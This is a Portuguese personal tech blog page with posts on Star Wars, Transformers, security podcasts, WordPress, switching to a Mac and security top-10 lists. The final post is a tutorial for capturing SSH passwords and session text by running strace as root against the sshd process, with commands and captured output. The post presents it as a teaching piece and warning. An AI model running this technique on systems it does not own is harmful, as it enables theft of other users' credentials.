… BlogMind … Where open minds meet …

Isto mesmo …

Star Wars faz 30 anos hoje …

No dia 25 de maio de 1977 foi lançado o primeiro filme da trilogia que virou 6 filmes (não sei como se escreve uma serie de seis filmes).
O primeiro filme que acabou virando o IV da série que lançou Anakin, Luke, Pricesa Leia, R2D2, C3PO, Darth Vader e etc, recebeu o nome de “A New Hope” (A nova Esperança) e em seguida vieram o Império Contra Ataca e o Retorno de Jedi …

O que isto tem a ver com informática?

Todo geek e/ou nerd que se preze e eu me incluo na categoria de Geek, adora Star Wars e viu todos os filmes algumas vezes e sempre quiz medir a sua quantidade de Midi-chlorians …
E o sonho de todo Profissional de Informática é virar “jedi” em alguma coisa … diz aí: programação, administração, segurança, gestão e etc …

Eu sou um simpes Padawan … que cresceu vendo Luke lutar com  Dath Vader (seu pai) e tentando mover as coisas com o poder do pensamento …

Abaixo o código Jedi:

“There is no emotion, there is peace.” – Não existe emoção, existe paz.

“There is no ignorance, there is knowledge.” – Não existe ignorância, existe conhecimento

“There is no passion, there is serenity.” – Não existe paixão, existe serenidade.

“There is no death, there is the Force.” – Não existe morte, existe a Força.

Filosofia Sith:

“Peace is a lie, there is only passion.” – Paz é uma mentira, só existe paixão.

“Through passion, I gain strength.” – Através da paixão, ganho força.

“Through strength, I gain power.” – Através da força, ganho poder.

“Through power, I gain victory.” – Através do poder, atinjo a vitória.

“Through victory, my chains are broken.” – Através da vitória, as minhas correntes são quebradas

“The Force shall free me.” – A força libertar-me-á.

Depois do fracasso e da decepção de ver um Peter Parker EMO em Homem Aranha 3 espero ansioso por dois lançamentos do Cinema:

Quarteto Fantático 2 com o Surfista Prateado

e

Transformers …

Quem tem mais tempo de “background” e mais verões sobre as costas deve lembrar com carinho e nostalgia da época em que “desenhos eram desenhos”, “crianças eram crianças” e passava Transformers na Xuxa pela manhã …

Cara que saudade destes desenhos … o lançamento deste filme, dirigido pelo Steven Spilberg, me levou a conseguir com um outro amigo, que também já não cozinha na primeira fervura, os 16 primeiros episódios do desenho original.

E os vendo hoje relembrei o quao legal eram os desenhos daquela época …

Serviço do Filme (não perca pois vai ser muito bom!!):

Gênero: Aventura – Ação
Duração: -
Origem: EUA
Estréia – EUA: 04 de Julho de 2007
Estréia – Brasil: 20 de Julho de 2007
Estúdio: DreamWorks – Paramount Pictures
Direção: Michael Bay
Roteiro: Roberto Orci, Alex Kurtzman
Produção: Don Murphy, Tom DeSanto, Lorenzo di Bonaventura, Roberto Orci, Ian Bryce

” O olho do homem serve de fotografia ao invisí­vel, como o ouvido
serve de eco ao silêncio.”
–Machado de Assis

Eu sou um assiduo ouvinte de Podcasts e tem alguns que escuto com frequência …
Dentre eles tem três Podcasts que quero destacar e indicar aqui por tratarem de Segurança em Sistemas de Informação …

1) Security Radio
Este foi o primeiro dos três e que infelizmente não é mais feito, isto é, o último episódio foi de meses atrás.
Foram lançados nove (9) episódios somente, mas que se mantêm muito atuais e valem cada minuto gasto em sua escuta.
A página inda está no ar e portanto os episódios podem ser baixados via RSS em formato mp3 ou diretamente na página em mp3 e wma.
Tirada da própria página: “SecurityRadio.org é um projeto sem fins lucrativos, desenvolvido e mantido pelo Laboratório ACME!“

2) I Shot the Sheriff
Este é um podcast em atividade e mantido por três figurinhas carimbadas da cena de Segurança do Brasil e que além de trazer noticias sobre Segurança é bem humorado …
Os caras são um sarro … o Luiz Eduardo é muito arriado … vale escutar …
É bom para quem quer saber quais são os próximos eventos de segurança pelo mundo ( eles sempre noticiam lá .. os chamados “call for papers“).
Em termos técnicos não acresenta muito, mas vale pela informação e por ser praticamente o único em Português …
Já está no número 19 e a idéia é lançar um por semana … espero que consigam …

2) Netcast
Um Podcast mantido pela empresa Sentinela Security e que está na edição 2.
É bem feito, embora acho meio curto e os caras são mais sérios, talvez por estarem representando uma empresa e estejam preocupados com a imagem.
Mas em termos de assunto achei legal os dois episódios …
Vale acompanhar …

Caso tenham mais algum para indicar que eu não conheço … coloquem nos comentários …

Fiz o upgrade da Versao do Blog para o Wordpress 2.2 e não notei grande diferença.
A interface de administração não trouxe melhorias e como meu Tema não tem suporte a Widgets (veja como implantar aqui) eu não vou poder utilizar esta nova feature, por enquanto (dá muito trabalho mudar o tema).

Dá para ver as melhorias que foram implementadas nesta nova versão que é a primeira após a implantação do novo ciclo de release (a cada 4 meses) clicando aqui.

O Wordpress para quem não sabe é um (Gerenciador de Conteúdo) para páginas Web, mais especificamente para blogs, que eu e outros milhões de blogueiros utilizam para gerenciar seus blogs.

Como medida de segurança é uma boa prática e extremamente recomendável manter estes CMSs sempre atalizados, pois versões antigas podem conter falhas de segurança corrigidas nos novos releases.
Nesta versão 2.2 não foi notificada nenhuma correção de falha, apenas melhorias, mas vale o upgrade.

Como muitos que eu conheço e que assim como eu odeiam, mas o fazem, sou o técnico de informática da minha familia (pai e irmãos) e sendo assim sou frequentemente requisitado a dar suporte (leia reinstalar) o Rwindows da máquina deles.

Acontece que isto é uma das coisas que eu menos gosto de fazer: Solucionar problemas do Windows … aja saco e paciência para tratar de instabilidades do Sistema Operacional causadas por malwares, programas mal feitos  e falhas de segurança que possibilitam que a máquina se torne um zumbi e fique nas mãos de botnets e acabe sendo usada por Spammers e ataques de DOS.

Fora ter que se preocupar com incompatibilidade hardware, falta de drivers e conflitos de IRQ/DMA e etc … enfim Windows é um saco !!

Eu larguei, “esta droga”, já faz tempo e quem acompanha o blog sabe que eu sou usuário do OSX (leia minha impressões aqui) no meu Desktop e sou um feliz proprietário de um iBook G4 com o Tiger rodando.
Interinamente, na minha empresa atual, estou usando o Debian (Lenny) como Desktop, pois as regras internas não permitem que se conecte na rede notebooks “não homologados” … pelo lá as regras são respeitadas até pela diretoria!! Entretanto espero mudar isto em breve e convencê-los a me deixar usaro o meu laptop !!

Também sou defensor de que o o melhor Sistema Operacional para Desktop é aquele no qual tu é mais produtivo (leia meu post que fala disto aqui), mas para o usuário iniciante o Windows é um “Buraco de Segurança” e um prato cheio para a Instabilidade.

Bem …

Acabei conseguindo convencer meu coroa a comprar um MacMini e abandonar o Windows e solucionei dois problemas: o meu e o dele!!

O dele pois agora ele terá um sistema mais seguro, estável e amigável para usar,  com uma curva de aprendizado pequena e com um hardware bonito, completo e poderoso. Dará Adeus ao AVG (antivírus), Spybot, AntiSpyware, Internet Explorer e etc … e todas as preocupações que um usuário de Windows tem.

O meu pois não precisarei mais dar suporte ao Windows, se bem que ainda tem o Desktop dos meus irmãos … mas já estou providenciando uma mudança gradual para o Ubuntu … deixa comigo …

Enfim … mais um usuário convertido e feliz …
Dará um tchau a pirataria de software e poderá navegar nos sites xxx.com que ele adora … ehehhe

Isto é uma analogia, qulaquer relação com a vida real é mera coincidência …
Postado originalmente no blog do Parlenda Tecnológica.

O Analista de Sistemas: É o bombeiro tentando apagar o incêndio.

O Gerente de Tecnologia: Além de ser o último a saber do incêndio, quer que todos os bombeiros parem tudo e expliquem para ele – EM DETALHES – por que o prédio está pegando fogo.

O Diretor: Quer que os bombeiros parem tudo para lhe dar uma previsão de quando terminará o rescaldo; e digam se já foi planejada alguma providência para que não aconteça outro incêndio como esse.

O Coordenador: É o cara que ouve você dizer “Eu desconfio que foi um problema no aquecimento central” e já sai correndo para processar o fabricante de aquecedores.

O Analista de Outro Sistema: É o vizinho que vem te cutucar para tirar o gato dele de cima da árvore e, depois de quinze minutos, vai reclamar com o chefe dos bombeiros que o gato continua em cima da árvore.

O Analista de Help-Desk: É o repórter que vem, de hora em hora, lhe perguntar qual a situação do incêndio e quando ele estará apagado. Tudo isso em cadeia nacional, no plantão do telejornal, enquanto seu nome aparece no rodapé de televisores do país inteiro.

O Analista de Produção: É o operador de rádio do corpo de bombeiros que, quando você chama solicitando reforços e carros de resgate, diz que este pedido precisa da aprovação por escrito do seu capitão.

O Usuário: É a mocinha esperta, que teve a brilhante idéia de fumar deitada no edredon, e agora tá lá na janela, se esgoelando.

“A amizade é um amor que nunca morre.”
–Mário Quintana

Já deu para notar que gosto de Listas de Top 10 e para não perder o andar da carruagem estou postanto aqui um outro Ranking que encontrei no site EarthWeb com uma lista da 10 mais importantes ferramentas de Segurança Opensource.

O post me deixou agradavelvente surpreso por listar entre as ferramentas o OSSEC, que é um IDS desenvolvido por brasileiros e que realmente é muito bom.

Abaixo segue a lista dos escolhidos pelo site (post original aqui), todavia a minha seria um pouco diferente:

1. Nessus
   
2. Snort
3. Nagios
4. SpamAssasssin
5. ClamAV
6. Open SSL
7. Nmap
8. Ossec HIDS
9. OpenSSH
10. Wireshark

Outra coisa que não me surpreende mas é importante apontar é o fato de todas elas tem versões para o OSX nativas ou rodam perfeitamente se instaladas via pacote fonte.

” O homem e um bipede sem plumas.”
        — Platao

Saiu no ITSecurity uma lista dos 10 mais famosos Hackers e Crackers da História.
O site dividiu em duas Categorias:

Black Hat Crackers

1. jonathan James
2. Adrian Lamo
3. Kevin Mitinick
4. Kevin Poulsen
5. Robert Tappan Morris

White Hat Hackers

1. Stephen Wozniak
2. Tim Berners-Lee
3. Linux Torvalds
4. Richard Stallman
5. Tsutomu Shimomura

Alguns pontos que achei interessante das escolhas foram o Woz como primeiro Hacker (para quem não sabe ele é um dos fundadores da Apple ao lado do outro Steve … Jobs). O autor deve ser entusiasta da Apple.
E deve gostar de filmes de hackers por ter escolhido o Mitinik e o Shimomura, protagonistas de uma das mais famosas histórias de “gato e rato” da Cultura Hacker.

A minha lista seria diferente … mas quem sou eu para julgar estes caras??

Outra lista de Top 10 que li recentemente e que me chamou a atenção é a de Ameaças de Segurança …
As ameaças não são novas mas o que me surpeendeu foi o reconhecimento de que a maior delas é a Engenharia Social (e talvez o Kevin Mitinick era um grande gênio) …
De nada adiante termos as melhores ferramentas de segurança se ao ligar para a Secretária ela fornecer seu login e senha para acesso ao computador e/ou o helpdesk fornecer dados críticos da rede a alguem ao telefone sem saber com confiança quem é …
Vale a leitura …

Abraços

É possivel Sniffar as Conexões via SSH simplesmente escutando as chamadas System Calls do daemon SSHD.
Existe um ponto de comunicação entre o SSHD e o Kernel, entre a Criptografia e a Descriptografia, em que os dados passam em Texto Plano (plain text) e este tráfego pode ser capturado com o uso do Strace.

Sniffando a Senha do Login:

1) No servidor que está com o Server do SSH rodando descubra qual o pid do daemon sshd:

Zion:~# ps aux | grep sshd | grep -v grep
root      6097  0.0  0.1   4792  1076 ?        Ss   16:49   0:00 /usr/sbin/sshd

2) De posse deste pid dispare o Strace (como root):

Zion:~# strace -f -p 6097 -o snif_ssh.txt &

Este comando irá logar no arquivo sniff_ssh.txt todas as chamadas  do processo de pid 6097 (sshd).
Uma lida no man do strace ajuda a entender e experimentar outras opções de filtragem e paãmetros.

3) De um outro servidor, ou para fins de teste da mesma máquina, faça um ssh com um usuário qualquer:

godoy@Zion:~$ ssh localhost
Password: textoplano
Last login: Mon May  7 17:01:15 2007 from localhost.localdomain
godoy@Zion:~$

4) Agora analíse as saídas que foram logadas no arquivo sniff_ssh.txt, procure pelas chamadas read ou write:

Zion:~# cat snif_ssh.txt | grep read | more
6521  write(4, “\0\0\0\1\0\0\0\ntextoplano”, 18 <unfinished …>
6520  <… read resumed> “7\0\0\0\1\0\0\0\ntextoplano”, 19) = 19
6520  write(7, “\0\0\0\ntextoplano”, 14 <unfinished …>
6522  <… read resumed> “\6\0\0\0\ntextoplano”, 15) = 15

Sniffando as demais transferências de dados:

1) Digite o seguinte comando, restringindo a busca as chamadas read e write:

Zion:~# strace -f -p 6097 -o snif_ssh.txt -v -e trace=read,write -s 128 &

2) Teste alguns comandos no cliente:

godoy@Zion:~$ cat > teste.txt
======== OK =======
Sniffou??
======= OK =======
godoy@Zion:~$

3) Verifique o log o servidor pesquisando por write ou read:

Zion:~# cat snif_ssh.txt | grep  ===
6586  <… read resumed> “======== OK =======\n”, 4096) = 20
6586  write(1, “======== OK =======\n”, 20) = 20
6586  <… read resumed> “======= OK =======\n”, 4096) = 19
6586  write(1, “======= OK =======\n”, 19) = 19
Zion:~# cat snif_ssh.txt | grep  Sniff
6586  <… read resumed> “Sniffou??\n”, 4096) = 10
6586  write(1, “Sniffou??\n”, 10)       = 10
Zion:~#

Como a saída do Strace é muito prolixa e pode rapidamente criar um arquivo bem grande, cabe aqui um script  para filtrar melhor o log que será gravado no arquivo sniff_ssh.txt.
Pode-se imaginar que é perfeitamente possível disparar tais comandos no lado do cliente!!
E que também pode-se criar um rootkit que se aproveite desta comunicação de SystemCalls para pegar o tráfego entre o Servidor SSH e seus clientes.
Portanto tome muito cuidado com os seus servidores SSH e coms seus clientes.

Este texto tem o objetivo de ser bem didático e não técnico. Veja o texto completo que originou este aqui.

” … eu … um pouco decepcionado com o SSH …”